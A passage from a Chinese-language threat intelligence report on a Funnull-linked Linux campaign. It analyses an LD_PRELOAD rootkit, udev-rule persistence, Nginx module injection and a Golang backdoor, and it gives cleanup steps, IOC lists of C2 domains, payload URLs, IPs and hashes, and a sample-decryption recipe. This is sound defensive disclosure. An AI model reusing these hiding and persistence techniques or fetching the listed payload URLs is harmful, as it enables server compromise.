<p>libutilkeybd.so&#x662F;&#x4E00;&#x4E2A;&#x57FA;&#x4E8E;LD_PRELOAD&#x6280;&#x672F;&#x7684;&#x7528;&#x6237;&#x6001;Rootkit&#xFF0C;&#x6211;&#x4EEC;&#x5C06;&#x5B83;&#x547D;&#x540D;&#x4E3A;Badhide2s&#xFF0C;&#x5B83;&#x7684;&#x57FA;&#x672C;&#x4FE1;&#x606F;&#x5982;&#x4E0B;&#x6240;&#x793A;&#xFF1A;</p>
<pre><code>MD5: 85cdf5139f0a0a0f7e378bc2029d662b
MAGIC: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, not stripped
Packer: None
</code></pre>
<p>Badhide2s&#x7684;&#x6838;&#x5FC3;&#x76EE;&#x6807;&#x5206;&#x4E3A;&#x4E24;&#x65B9;&#x9762;&#xFF1A;<strong>&#x8F7D;&#x8377;&#x75D5;&#x8FF9;&#x9690;&#x533F;</strong>&#x4E0E;<strong>Nginx&#x6A21;&#x5757;&#x52A8;&#x6001;&#x690D;&#x5165;</strong>&#x3002;</p>
<ul>
<li>
<p><strong>&#x9690;&#x533F;&#x7EF4;&#x5EA6;</strong>&#xFF1A;&#x901A;&#x8FC7;&#x5199;&#x5165;<code>/etc/ld.so.preload</code>&#x4F7F;&#x81EA;&#x8EAB;&#x88AB;&#x52A0;&#x8F7D;&#xFF0C;&#x5B9E;&#x73B0;&#x5BF9;<code>ss</code>&#x3001;<code>netstat</code>&#x3001;<code>top</code>&#x3001;<code>htop</code>&#x3001;<code>ps</code>&#x3001;<code>ls</code>&#x3001;<code>lsof</code>&#x7B49;&#x5E38;&#x7528;&#x5DE5;&#x5177;&#x7684;&#x8FC7;&#x6EE4;&#xFF0C;&#x8986;&#x76D6;<strong>&#x6587;&#x4EF6;&#x3001;&#x8FDB;&#x7A0B;&#x3001;&#x7F51;&#x7EDC;</strong>&#x4E09;&#x5927;&#x7EF4;&#x5EA6;&#x7684;&#x75D5;&#x8FF9;&#x9690;&#x85CF;&#x3002;&#x6B64;&#x7C7B;&#x7528;&#x6237;&#x6001;Rootkit&#x624B;&#x6CD5;&#x5728;Linux&#x6076;&#x610F;&#x8F6F;&#x4EF6;&#x4E2D;&#x8F83;&#x4E3A;&#x5E38;&#x89C1;&#xFF0C;Badhide2s&#x5E76;&#x672A;&#x5B9E;&#x73B0;&#x663E;&#x8457;&#x7684;&#x6280;&#x672F;&#x521B;&#x65B0;&#xFF0C;&#x4F46;&#x5176;&#x9690;&#x533F;&#x7684;IP&#x5730;&#x5740;&#x6570;&#x91CF;&#x8FBE;25&#x4E2A;&#xFF0C;&#x89C4;&#x6A21;&#x76F8;&#x5BF9;&#x8F83;&#x5927;&#x3002;</p>
</li>
<li>
<p><strong>&#x6A21;&#x5757;&#x690D;&#x5165;</strong>&#xFF1A;&#x901A;&#x8FC7;Hook <code>__libc_start_main</code>&#x2014;&#x2014;GNU C&#x5E93;&#x7684;&#x7A0B;&#x5E8F;&#x5165;&#x53E3;&#x51FD;&#x6570;&#x2014;&#x2014;&#x5728;&#x8FDB;&#x7A0B;&#x542F;&#x52A8;&#x9636;&#x6BB5;&#x8FDB;&#x884C;&#x68C0;&#x6D4B;&#x3002;&#x5F53;&#x8BC6;&#x522B;&#x5230;&#x76EE;&#x6807;&#x8FDB;&#x7A0B;&#x4E3A;Nginx&#x65F6;&#xFF0C;&#x52A8;&#x6001;&#x7BE1;&#x6539;&#x5176;&#x542F;&#x52A8;&#x53C2;&#x6570;&#xFF0C;&#x8FFD;&#x52A0; <code>-g load_module /var/adm/{hash}nginx/module.so</code> &#xFF0C;&#x4ECE;&#x800C;&#x5B9E;&#x73B0;&#x6076;&#x610F;&#x6A21;&#x5757;&#x7684;&#x9690;&#x853D;&#x52A0;&#x8F7D;&#x3002;</p>
</li>
</ul>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/02/ring_ngxload.png" alt="ring_ngxload.png" loading="lazy"></p>
<p>&#x503C;&#x5F97;&#x6CE8;&#x610F;&#x7684;&#x662F;&#xFF0C;Badhide2s &#x5185;&#x7F6E;&#x4E86;&#x4E00;&#x4E2A;<strong>&#x73AF;&#x5883;&#x53D8;&#x91CF;&#x89E6;&#x53D1;&#x5F00;&#x5173;</strong>&#x673A;&#x5236;&#xFF1A;&#x5F53;&#x68C0;&#x6D4B;&#x5230;&#x7CFB;&#x7EDF;&#x4E2D;&#x5B58;&#x5728;&#x73AF;&#x5883;&#x53D8;&#x91CF; <code>RING04</code>&#xFF0C;&#x4E14;&#x5176;&#x503C;&#x4E3A;&#x7279;&#x5B9A;&#x54C8;&#x5E0C;&#x4E32;&#x65F6;&#xFF0C;&#x8BE5;&#x6076;&#x610F;&#x8F6F;&#x4EF6;&#x7684;&#x6240;&#x6709;&#x9690;&#x85CF;&#x529F;&#x80FD;&#x5C06;&#x81EA;&#x52A8;&#x5173;&#x95ED;&#x3002;&#x8FD9;&#x5B9E;&#x9645;&#x4E0A;&#x4E3A;&#x5E94;&#x6025;&#x54CD;&#x5E94;&#x63D0;&#x4F9B;&#x4E86;&#x4E00;&#x4E2A;<strong>&#x5FEB;&#x901F;&#x6392;&#x67E5;&#x5165;&#x53E3;</strong>&#xFF0C;&#x9632;&#x5FA1;&#x65B9;&#x5728;&#x83B7;&#x53D6;&#x54C8;&#x5E0C;&#x503C;&#x540E;&#xFF0C;&#x53EA;&#x9700;&#x6267;&#x884C;&#xFF1A;export RING04H={hash}&#x5373;&#x53EF;&#x4E00;&#x952E;&#x89E3;&#x9664;&#x6240;&#x6709;&#x9690;&#x533F;&#xFF0C;&#x4F7F;&#x88AB;&#x9690;&#x85CF;&#x7684;&#x6076;&#x610F;&#x8FDB;&#x7A0B;&#x3001;&#x6587;&#x4EF6;&#x53CA;&#x7F51;&#x7EDC;&#x8FDE;&#x63A5;&#x5B8C;&#x5168;&#x201C;&#x663E;&#x5F62;&#x201D;&#x3002;</p>
<h2 id="0x6-udev-rule-script">0x6: udev rule &amp; script</h2>
<p>&#x5229;&#x7528;udev&#x89C4;&#x5219;&#x5B9E;&#x73B0;&#x6301;&#x4E45;&#x5316;&#xFF0C;&#x5728;Linux &#x5A01;&#x80C1;&#x4E2D;&#x5E76;&#x4E0D;&#x5E38;&#x89C1;&#xFF0C;&#x76EE;&#x524D;&#x516C;&#x5F00;&#x7684;&#x6848;&#x4F8B;&#x53EA;&#x6709;&#x4FE9;&#x4E2A;&#xFF1A;<strong>sedexp&#x4EE5;&#x53CA;UNC3886</strong>&#x3002;&#x6240;&#x8C13; udev &#xFF0C;&#x6307;&#x7684;&#x662F; Linux &#x5185;&#x6838;&#x7684;&#x8BBE;&#x5907;&#x7BA1;&#x7406;&#x7CFB;&#x7EDF;&#xFF0C;&#x8D1F;&#x8D23;&#x52A8;&#x6001;&#x7BA1;&#x7406; /dev &#x76EE;&#x5F55;&#x4E0B;&#x7684;&#x8BBE;&#x5907;&#x8282;&#x70B9;&#x6587;&#x4EF6;&#xFF0C;&#x5305;&#x62EC;&#x521B;&#x5EFA;&#x8BBE;&#x5907;&#x8282;&#x70B9;&#x3001;&#x5904;&#x7406;&#x70ED;&#x63D2;&#x62D4;&#x4E8B;&#x4EF6;&#x4EE5;&#x53CA;&#x6309;&#x9700;&#x52A0;&#x8F7D;&#x9A71;&#x52A8;&#x7A0B;&#x5E8F;&#x3002;udev &#x89C4;&#x5219;&#x662F;&#x5176;&#x914D;&#x7F6E;&#x6587;&#x4EF6;&#xFF0C;&#x7528;&#x4E8E;&#x5339;&#x914D;&#x8BBE;&#x5907;&#x4E8B;&#x4EF6;&#xFF08;&#x5982;&#x63A5;&#x5165;&#x6216;&#x79FB;&#x9664;&#x8BBE;&#x5907;&#xFF09;&#x5E76;&#x89E6;&#x53D1;&#x76F8;&#x5E94;&#x64CD;&#x4F5C;&#xFF0C;&#x5B83;&#x4EEC;&#x901A;&#x5E38;&#x4F4D;&#x4E8E; /etc/udev/rules.d/ &#x6216; /lib/udev/rules.d/ &#x76EE;&#x5F55;&#x4E0B;&#xFF0C;&#x5178;&#x578B;&#x7684;&#x89C4;&#x5219;&#x5982;&#x4E0B;&#x6240;&#x793A;&#xFF0C;&#x7531;<strong>&#x8BBE;&#x5907;&#x5339;&#x914D;&#x6761;&#x4EF6;&#x548C;&#x5BF9;&#x5E94;&#x7684;&#x6267;&#x884C;&#x52A8;&#x4F5C;</strong>&#x7EC4;&#x6210;&#x3002;</p>
<pre><code>ACTION==&quot;add&quot;, KERNEL==&quot;device&quot;, RUN+=&quot;/path/to/script&quot;
</code></pre>
<p>&#x6B64;&#x6B21;&#x6D3B;&#x52A8;&#x4F1A;&#x5728;/etc/udev/ruldes.d&#x76EE;&#x5F55;&#x4E0B;&#x589E;&#x52A0;&#x4E00;&#x4E2A;<strong>99-{hash}.rules</strong>&#x7684;&#x89C4;&#x5219;&#xFF0C;&#x5F53;&#x4EFB;&#x610F;&#x975E;&#x672C;&#x5730;&#x56DE;&#x73AF;&#x7684;&#x7F51;&#x7EDC;&#x63A5;&#x53E3;&#xFF08;&#x5305;&#x62EC;&#x7269;&#x7406;&#x7F51;&#x5361;&#x3001;&#x865A;&#x62DF;&#x63A5;&#x53E3;&#xFF09;&#x88AB;&#x7CFB;&#x7EDF;&#x8BC6;&#x522B;&#x65F6;&#xFF08;add &#x4E8B;&#x4EF6;&#xFF09;&#xFF0C;&#x8BE5;&#x89C4;&#x5219;&#x4F1A;&#x7ACB;&#x5373;&#x88AB;&#x89E6;&#x53D1;&#xFF0C;&#x901A;&#x8FC7; systemd-run &#x542F;&#x52A8;&#x4E00;&#x4E2A;&#x53D7;&#x63A7;&#x7684;&#x4E34;&#x65F6;&#x670D;&#x52A1;&#xFF0C;&#x9690;&#x853D;&#x6267;&#x884C;&#x6307;&#x5B9A;&#x7684;&#x811A;&#x672C;<code>/var/adm/{hash}/udev/udev.sh</code> &#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_udevrules.jpg" alt="ring_udevrules.jpg" loading="lazy"></p>
<p>udev.sh&#x811A;&#x672C;&#x5C31;&#x662F;&#x6CA1;&#x6709;&#x4EC0;&#x4E48;&#x7279;&#x522B;&#x4E4B;&#x5904;&#xFF0C;&#x53EA;&#x662F;&#x7528;&#x6765;&#x542F;&#x52A8;&#x524D;&#x6587;&#x5206;&#x6790;&#x8FC7;&#x7684;Badredis2s&#x540E;&#x95E8;&#xFF08;ring04h_office_bin&#xFF09;&#xFF0C;&#x4EE5;&#x53CA;&#x4E00;&#x4E2A;&#x672A;&#x77E5;&#x7684;&#x7EC4;&#x4EF6;&#xFF08;ring04h_agent_bin&#xFF09;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_udevsh.jpg" alt="ring_udevsh.jpg" loading="lazy"></p>
<h1 id="%E9%A2%9D%E5%A4%96%E7%9A%84%E6%83%85%E6%8A%A5">&#x989D;&#x5916;&#x7684;&#x60C5;&#x62A5;</h1>
<p>&#x5728;download_init&#x4E2D;&#xFF0C;&#x6709;&#x4E00;&#x4E2A;main_pre&#x7684;&#x51FD;&#x6570;&#xFF0C;&#x7528;&#x4E8E;&#x6E05;&#x9664;&#x7684;&#x75D5;&#x8FF9;&#xFF0C;&#x4ECE;&#x51FD;&#x6570;&#x903B;&#x8F91;&#x6765;&#x770B;&#xFF0C;<strong>&#x8FD9;&#x4E9B;&#x75D5;&#x8FF9;&#x4E0E;RingH23&#x5F3A;&#x76F8;&#x5173;</strong>&#x3002;&#x5728;&#x6E05;&#x7406;&#x76EE;&#x6807;&#x7684;&#x6570;&#x7EC4;&#x4E2D;&#x5305;&#x542B;17&#x4E2A;&#x4E0D;&#x540C;&#x7684;&#x5B57;&#x4E32;&#xFF0C;&#x4EE4;&#x4EBA;&#x60CA;&#x5947;&#x7684;&#x662F;&#x5176;&#x4E2D;&#x4E00;&#x4E9B;&#x5B57;&#x4E32;&#xFF0C;&#x5982;<code>libcext.so.2&#xFF0C;/var/log/cross/auto-colar</code>&#x7B49;&#x660E;&#x663E;&#x548C;Palo Alto Networks &#x4E8E;2025&#x5E74;2&#x6708;24&#x65E5;&#x62AB;&#x9732;&#x7684;autocolor&#x540E;&#x95E8;&#x76F8;&#x5173;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_specialstring.jpg" alt="ring_specialstring.jpg" loading="lazy"></p>
<p>&#x6B64;&#x5916;&#xFF0C;&#x6211;&#x4EEC;&#x53D1;&#x73B0; <code>/var/log/jroqq</code> &#x662F;&#x4E00;&#x4E2A;&#x975E;&#x5E38;&#x72EC;&#x7279;&#x7684;&#x5B57;&#x7B26;&#x4E32;&#xFF0C;&#x5E76;&#x4EE5;&#x6B64;&#x4E3A;&#x7EBF;&#x7D22;&#xFF0C;&#x627E;&#x5230;&#x4E86;&#x4E00;&#x4E2A;&#x7528; Golang &#x8BED;&#x8A00;&#x5B9E;&#x73B0;&#x7684;&#x540E;&#x95E8;&#x6587;&#x4EF6; auto-color&#x3002;&#x8BE5;&#x540E;&#x95E8;&#x901A;&#x8FC7;&#x6587;&#x4EF6;&#x9501; /var/log/jroqq/auto.l &#x5B9E;&#x73B0;&#x5355;&#x4E00;&#x5B9E;&#x4F8B;&#x8FD0;&#x884C;&#xFF0C;&#x4F46;&#x540E;&#x95E8;&#x672C;&#x8EAB;&#x5E76;&#x672A;&#x5305;&#x542B;&#x521B;&#x5EFA;&#x8BE5;&#x6587;&#x4EF6;&#x7684;&#x4EE3;&#x7801;&#xFF0C;&#x8BF4;&#x660E;&#x5B83;&#x9700;&#x8981;&#x4E0E;&#x5176;&#x4ED6;&#x7EC4;&#x4EF6;&#x534F;&#x540C;&#x5DE5;&#x4F5C;&#xFF0C;&#x6211;&#x4EEC;&#x5185;&#x90E8;&#x5C06;&#x5176;&#x547D;&#x540D;&#x4E3A; V2deck&#x3002;&#x5B83;&#x7684;&#x4E3B;&#x8981;&#x529F;&#x80FD;&#x662F;&#x6267;&#x884C;C2&#x4E0B;&#x53D1;&#x7684;&#x547D;&#x4EE4;&#x5E76;&#x56DE;&#x4F20;&#x7ED3;&#x679C;&#x3002;&#x6837;&#x672C;&#x4E2D;&#x4E00;&#x5171;&#x5185;&#x5D4C;&#x4E86;10&#x4E2A;C2&#xFF0C;&#x4F7F;&#x7528; XOR + BASE64&#x7684;&#x65B9;&#x5F0F;&#x8FDB;&#x884C;&#x4FDD;&#x62A4;&#xFF0C;xor key&#x4E3A; poop&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_v2deck.jpg" alt="ring_v2deck.jpg" loading="lazy"></p>
<p>&#x76EE;&#x524D;&#x8DDF;&#x8E2A;&#x5230;&#x7684;&#x6307;&#x4EE4;&#x663E;&#x793A;V2deck&#x5728;&#x6536;&#x96C6;Nginx,FikkerCDN&#x7B49;&#x8FDB;&#x7A0B;&#x7684;&#x4FE1;&#x606F;&#xFF0C;&#x548C;RingH23&#x7684;&#x76EE;&#x6807;&#x63A5;&#x8FD1;&#x3002;</p>
<pre><code>ps -ef | grep Fikker | grep -v grep | wc -l

ss -antp | grep nginx |grep ESTAB | awk {&apos;print $5&apos;} | awk -F\: {&apos;print $1&apos;} | sort | uniq | wc -l

</code></pre>
<p>&#x5C3D;&#x7BA1;&#x76EE;&#x524D;&#x4EC5;&#x4EE5;&#x4E2D;&#x7B49;&#x4FE1;&#x5FC3;&#x5C06; v2deck &#x4E0E; RingH23 &#x5173;&#x8054;&#x8D77;&#x6765;&#xFF0C;&#x4F46;&#x8003;&#x8651;&#x5230;&#x8BE5;&#x540E;&#x95E8;&#x6837;&#x672C;&#x53CA;&#x5176; C2 &#x57DF;&#x540D;&#x76EE;&#x524D;&#x7684;&#x68C0;&#x6D4B;&#x7387;&#x6781;&#x4F4E;&#xFF0C;&#x6211;&#x4EEC;&#x51B3;&#x5B9A;&#x5C06;&#x76F8;&#x5173;&#x60C5;&#x62A5;&#x4E0E;&#x672C;&#x6587;&#x4E00;&#x5E76;&#x53D1;&#x5E03;&#x3002;</p>
<h1 id="%E6%80%BB%E7%BB%93">&#x603B;&#x7ED3;</h1>
<p>&#x8FD9;&#x662F;&#x76EE;&#x524D;&#x638C;&#x63E1;&#x7684;Funnull&#x9ED1;&#x4EA7;&#x65B0;&#x6D3B;&#x52A8;&#x7684;&#x5927;&#x90E8;&#x5206;&#x60C5;&#x62A5;&#x3002;&#x6211;&#x4EEC;&#x5EFA;&#x8BAE;&#x7F51;&#x7EDC;&#x7BA1;&#x7406;&#x5458;&#x4E0E;&#x4E2A;&#x4EBA;&#x7F51;&#x7AD9;&#x6240;&#x6709;&#x8005;&#x7ACB;&#x5373;&#x5F00;&#x5C55;&#x81EA;&#x67E5;&#x5DE5;&#x4F5C;&#xFF0C;&#x5E76;&#x53C2;&#x7167;&#x4EE5;&#x4E0B;&#x6307;&#x5F15;&#x8FDB;&#x884C;&#x5904;&#x7F6E;&#x3002;</p>
<h4 id="%E2%91%A0-%E9%92%88%E5%AF%B9ringh23">&#x2460; &#x9488;&#x5BF9;RingH23</h4>
<p>&#x4F7F;&#x7528;ldd&#x547D;&#x4EE4;&#x68C0;&#x67E5;&#x7CFB;&#x7EDF;&#x547D;&#x4EE4;&#x7684;&#x4F9D;&#x8D56;&#x52A0;&#x8F7D;&#x60C5;&#x51B5;&#xFF0C;&#x91CD;&#x70B9;&#x68C0;&#x6D4B;&#x662F;&#x5426;&#x5B58;&#x5728;&#x6076;&#x610F;&#x6A21;&#x5757;<code>/var/adm/{uuid}/kernel/libutilkeybd.so</code>&#x3002;&#x82E5;&#x53D1;&#x73B0;&#x8BE5;&#x6A21;&#x5757;&#xFF0C;&#x5219;&#x8BBE;&#x7F6E;&#x73AF;&#x5883;&#x53D8;&#x91CF;RING04H={uuid} &#x4EE5;&#x7981;&#x7528;rootkit&#x7684;&#x4FDD;&#x62A4;&#x529F;&#x80FD;&#xFF0C;&#x968F;&#x540E;&#x6309;&#x4EE5;&#x4E0B;&#x8DEF;&#x5F84;&#x6E05;&#x7406;&#x6076;&#x610F;&#x6587;&#x4EF6;&#xFF1A;</p>
<ul>
<li>
<p>/etc/ld.preload.conf&#x4E2D;&#x4E0E;{uuid}&#x6709;&#x5173;&#x7684;&#x90E8;&#x5206;</p>
</li>
<li>
<p>/etc/udev/99-{uuid}.rules</p>
</li>
<li>
<p>/var/adm/{uuid}&#x76EE;&#x5F55;&#x4E0B;&#x6240;&#x6709;&#x6587;&#x4EF6;</p>
</li>
</ul>
<h4 id="%E2%91%A1-%E9%92%88%E5%AF%B9maccmsla">&#x2461; &#x9488;&#x5BF9;maccms.la</h4>
<p>&#x4E0D;&#x5EFA;&#x8BAE;&#x7EE7;&#x7EED;&#x4F7F;&#x7528;maccms.la&#x3002;&#x5982;&#x679C;&#x65E0;&#x6CD5;&#x8FC1;&#x79FB;&#xFF0C;&#x53EF;&#x4F7F;&#x7528;&#x201C;grep xxSJRox&#x201D;&#x67E5;&#x770B;&#x6A21;&#x677F;js&#x662F;&#x5426;&#x5DF2;&#x88AB;&#x6CE8;&#x5165;&#xFF0C;&#x201C;grep gzuncompress&#x201D;&#x67E5;&#x770B;php&#x4E2D;&#x662F;&#x5426;&#x53EF;&#x7591;&#x7684;&#x9690;&#x85CF;&#x8F7D;&#x8377;&#xFF0C;&#x5E76;&#x5BF9;&#x4EE5;&#x4E0B;&#x6587;&#x4EF6;&#x8FDB;&#x884C;&#x5904;&#x7406;</p>
<ul>
<li>&#x5220;&#x9664;/application/extra/active.php</li>
<li>&#x5220;&#x9664;/application/admin/controller/Update.php</li>
<li>&#x4FEE;&#x6539;/application/admin/view_new/index/index.html&#x4E2D;ajax&#x5347;&#x7EA7;&#x90E8;&#x5206;&#x7684;&#x57DF;&#x540D;</li>
</ul>
<p>&#x8FD9;&#x7C7B;&#x9ED1;&#x4EA7;&#x6D3B;&#x52A8;&#x5728;&#x5229;&#x76CA;&#x9A71;&#x4F7F;&#x4E0B;&#x5F80;&#x5F80;&#x201C;&#x91CE;&#x706B;&#x70E7;&#x4E0D;&#x5C3D;&#xFF0C;&#x6625;&#x98CE;&#x5439;&#x53C8;&#x751F;&#x201D;&#xFF0C;&#x5177;&#x6709;&#x8F83;&#x5F3A;&#x7684;&#x987D;&#x56FA;&#x6027;&#xFF0C;&#x5FC5;&#x987B;&#x4F9D;&#x9760;&#x5168;&#x884C;&#x4E1A;&#x7684;&#x534F;&#x540C;&#x5408;&#x4F5C;&#x624D;&#x80FD;&#x6709;&#x6548;&#x904F;&#x5236;&#x3002;&#x6211;&#x4EEC;&#x8BDA;&#x9080;&#x5B89;&#x5168;&#x5382;&#x5546;&#x53CA;&#x76F8;&#x5173;&#x6280;&#x672F;&#x673A;&#x6784;&#x4E0E;&#x6211;&#x4EEC;&#x5EFA;&#x7ACB;&#x8054;&#x7CFB;&#xFF0C;&#x63A8;&#x52A8;&#x60C5;&#x62A5;&#x5171;&#x4EAB;&#x4E0E;&#x8054;&#x52A8;&#x5904;&#x7F6E;&#xFF0C;&#x5171;&#x540C;&#x6253;&#x51FB;&#x7F51;&#x7EDC;&#x72AF;&#x7F6A;&#xFF0C;&#x7EF4;&#x62A4;&#x7F51;&#x7EDC;&#x5B89;&#x5168;&#x751F;&#x6001;&#x3002;&#x5982;&#x679C;&#x60A8;&#x5BF9;&#x6211;&#x4EEC;&#x7684;&#x7814;&#x7A76;&#x611F;&#x5174;&#x8DA3;&#xFF0C;&#x6216;&#x8005;&#x4E86;&#x89E3;&#x5185;&#x5E55;&#x6D88;&#x606F;&#xFF0C;&#x6B22;&#x8FCE;&#x901A;&#x8FC7;X&#x5E73;&#x53F0;&#x4E0E;&#x6211;&#x4EEC;&#x8054;&#x7CFB;&#x3002;</p>
<h1 id="ioc">IOC</h1>
<h4 id="badredis2s-c2">Badredis2s C2</h4>
<pre><code>ntp[.]asia
ntporg[.]com
sbindns[.]com
plusedns[.]com
mirrors163[.]com
linuxdistro[.]net
debianhacks[.]net
fedoraforums[.]net
ubuntucommands[.]com
</code></pre>
<h4 id="badredis2s-c2-config-url">Badredis2s C2 Config URL</h4>
<pre><code>https://3snzh72om4.apifox[.]cn
https://node.blob.core.windows[.]net/update/a1
https://node.blob.core.windows[.]net/update/a2
https://node.blob.core.windows[.]net/update/s7
https://node.blob.core.windows[.]net/update/s10
https://node.blob.core.windows[.]net/update/s11
https://node.blob.core.windows[.]net/update/s14
https://node.blob.core.windows[.]net/update/h2.debianhacks.net/online
https://node.blob.core.windows[.]net/update/j6.linuxdistro.net/online

https://az-blob.110[.]nz/update/s1
https://az-blob.110[.]nz/update/s2
https://az-blob.110[.]nz/update/s3
https://az-blob.110[.]nz/update/s4
https://az-blob.110[.]nz/update/s7
https://az-blob.110[.]nz/update/s9

</code></pre>
<h4 id="badnginx2s-related">Badnginx2s Related</h4>
<pre><code>gadlkd1[.]com

apk.aqyaqua[.]com
plist.aqyaqua.]com
mobileconfig.aqyaqua[.]com

https://dowoxox.gfewr[.]com/B9.apk
https://plist.ztyfv[.]com/d/4F48MCiqtsjDCS7QOWs3KU.plist
https://download.joymeet[.]top/app/2PG/00056321.mobileconfig
</code></pre>
<h4 id="v2deck-c2">V2deck C2</h4>
<pre><code>bobolickp92[.]cc
realfake909[.]net
firelategg[.]net
lucycally[.]me
moxymodiy[.]cc
9688hopeeasy[.]cc
flysky55[.]me
goyppg06[.]com
tutupytua[.]com
zybbzlast[.]com

</code></pre>
<h4 id="ips-domains-in-badhide2s">IPs &amp; Domains in Badhide2s</h4>
<pre><code>54.46.13.139
8.139.6.156
18.167.103.220
18.163.102.174
16.163.50.192
43.199.147.209
13.251.54.69
43.199.133.158
18.166.58.136
16.162.25.97
52.221.206.136
43.198.221.151
43.198.137.198
43.198.73.3
16.163.58.55
20.6.129.16
20.205.25.192
35.75.5.45
52.195.191.106
52.195.7.27
52.196.178.89
52.194.222.58
13.231.108.219
13.114.119.159
3.112.67.113
54.46.1.220

js.mirrors163[.]com
cn.js.mirrors163[.]com
update.ntporg[.]com
js.ntp[.]asia
js.ntporg[.]com
s10.ntporg[.]com
s11.ntporg[.]com
client.110[.]nz
js2.ntporg[.]com
a.plusedns[.]com
b.plusedns[.]com
js.sbindns[.]com
</code></pre>
<h4 id="js-host">JS HOST</h4>
<pre><code>jquecy[.]com
jsdclivr[.]com
jsdelivr[.]vip
bytedauce[.]com
bdustatic[.]com
clondflare[.]com
macoms[.]la
ailyunoss[.]com
ailyun-oss[.]com
</code></pre>
<h4 id="js-payload-url">JS PAYLOAD URL</h4>
<pre><code>https:]//code.jquecy[.]com/jquery.min-3.6.8.js
https://cdnjs.clondflare[.]com/jquery.min-3.7.8.1.js

https:]//cdnjs.jsdclivr[.]com/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css?v=3.7.8.2
https:]//static.bytedauce[.]com/ajax/libs/bootstrap/5.3.3/css/bootstrap-grid.min.css

https:]//union.macoms[.]la/jquery.min-4.0.2.js
https:]//cdn.jsdelivr[.]vip/jquery.min-3.7.0.js
https:]//api.bdustatic[.]com/jquery.min-4.0.12.js

</code></pre>
<h4 id="downloader-url">Downloader URL</h4>
<pre><code>https://az-blob.110[.]nz/update/init
http://download.zhw[.]sh/wK4QYDIRFV/init
http://download.zhw[.]sh/9aE5EFdJoS/init

https://bucket.service.generate.110[.]nz/udev.sh

https://bucket.service.generate.110[.]nz/2025-12-19/7d1d49a8d8c1fa7b4b743ed551fa338c112268e1/module.so

https://bucket.service.generate.110[.]nz/2025-12-19/7d1d49a8d8c1fa7b4b743ed551fa338c112268e1/udev.rules

https://bucket.service.generate.110[.]nz/2025-12-19/7d1d49a8d8c1fa7b4b743ed551fa338c112268e1/kernel.so

</code></pre>
<h4 id="video-ad-url">VIDEO AD URL</h4>
<pre><code>https://oss2025-6f57.obs.ap-southeast-1.myhuaweicloud[.]com/%E5%B9%BF%E5%91%8A_1.ts
</code></pre>
<h4 id="sample-md5">Sample MD5</h4>
<pre><code>663706d4f3948417d05c11bbfa6cdbc9 *init
65ac2839ab2790b6df8e80022982a2c0 *init
5d6c33bf931699805206b00594de5e71 *init

85cdf5139f0a0a0f7e378bc2029d662b *kernel.so
3bff298be46f8817862bce2ac0be3176 *kernel.so
6acb8bbcad3b8403f4567412cc6aa144 *kernel.so
946606977dd177347122867750244ae2 *kernel.so
92c630062f0fe207c628b95fade34b96 *kernel.so
563f5e605ebf1db8065fd41799e71bf9 *module.so
112e2eb2a57129ef175c3f64bccbac04 *module.so
cd36ec10f71b89dc259eb8825e668ae3 *module.so
6e14853a6ad5e752a516290bf586d700 *udev.rule
b5dfe88131fb1b3622a487df96be84e1 *udev.sh
79c492bfd8a35039249bacc6a31d7122 *ring04h_office_bin
2e7a42c9be6fc3840df867cb19c7afa5 *ring04h_office_bin
a688afd342cee9feb74c61503fb0b895 *ring04h_office_bin
85f3d29a8fd59e00fec83743664fb2b5 *ring04h_office_bin
fef497841554fff318b740dff7df3a49 *ring04h_office_bin
dfd1fbf0a98e0984da9516311ccc1f05 *ring04h_office_bin
da594309691161f6e999984c26e1a10f *ring04h_office_bin
18b699375c76328b433145bdac02ec49 *ring04h_office_bin
d3b0b6496747ee77ab15e5f5d9583a67 *ring04h_office_bin

b5a5d93cfc443ecbd3b52cfe485b738c *shell.plugin
296318b90bc9d01ab045da042b0ecb21 *filesearch.plugin
b8239ce64c07e39ae7bed9ae8f5f3d2f *filemanager.plugin
51830656b0825b22703e4fcf31aec84c *filetransport.plugin
22f0d58bc482d413a5cc8922c7f79378 *filedownloader.plugin

b06b9f13505eb49d6b3f4bddd64b12ce *active.php
eb03db7ac9f10af66a1e2b16185fcadc *addons.php

</code></pre>
<h1 id="cyberchef">Cyberchef</h1>
<pre><code>https://gchq.github.io/CyberChef/#recipe=From_Hexdump()AES_Decrypt(%7B&apos;option&apos;:&apos;Latin1&apos;,&apos;string&apos;:&apos;2B990667D0E087AE&apos;%7D,%7B&apos;option&apos;:&apos;Latin1&apos;,&apos;string&apos;:&apos;27FAD11C481BD789&apos;%7D,&apos;CBC&apos;,&apos;Raw&apos;,&apos;Raw&apos;,%7B&apos;option&apos;:&apos;Hex&apos;,&apos;string&apos;:&apos;&apos;%7D,%7B&apos;option&apos;:&apos;Hex&apos;,&apos;string&apos;:&apos;&apos;%7D)Drop_bytes(0,4,false)Zlib_Inflate(0,0,&apos;Adaptive&apos;,false,false)To_Hexdump(16,false,false,false)&amp;input=MDAwMDAwMDAgIDBlIDFkIDg1IDU0IDI4IDEyIGZiIGYyICA5YSAzYyBkZCAwMiA2YyA4MyBlZCBmOSAgIC4uLlQoLi4uIC48Li5sLi4uDQowMDAwMDAxMCAgODcgM2QgMGQgNDYgMWMgOTQgOWQgNDYgIDI2IDU1IDVjIDJhIDlhIDcyIDFjIGFhICAgLj0uRi4uLkYgJlVcKi5yLi4&amp;ieol=CRLF
</code></pre>
]]></content:encoded></item><item><title><![CDATA[针对飞牛 NAS 的僵尸网络Netdragon 快速分析]]></title><description><![CDATA[<h1 id="%E8%83%8C%E6%99%AF">&#x80CC;&#x666F;</h1>
